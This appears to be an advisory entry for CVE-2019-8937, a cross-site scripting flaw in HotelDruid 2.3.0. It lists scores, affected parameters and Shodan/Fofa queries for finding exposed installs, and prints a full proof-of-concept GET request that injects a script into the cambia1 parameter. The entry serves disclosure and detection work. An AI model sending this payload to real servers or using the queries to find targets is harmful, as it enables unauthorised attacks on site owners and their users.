| Title | HotelDruid 2.3.0 - Cross-Site Scripting |
|---|---|
| Author | LogicalHunter |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft or unauthorized actions. |
| Remediation | Upgrade to a patched version of HotelDruid or apply appropriate input sanitization to prevent XSS attacks. |
| CVSS Score | 6.1 |
| EPSS Score | 0.50859 |
| CVE ID | CVE-2019-8937 |
| CWE ID | CWE-79 |
| Shodan Query | http.title:"hoteldruid"http.favicon.hash:-1521640213 |
| Fofa Query | title="hoteldruid"icon_hash=-1521640213 |
| Tags | cve2019 cve packetstorm xss hoteldruid edb digitaldruid vuln |
HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
GET /hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-8937.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-8937.pcap
N/AN/A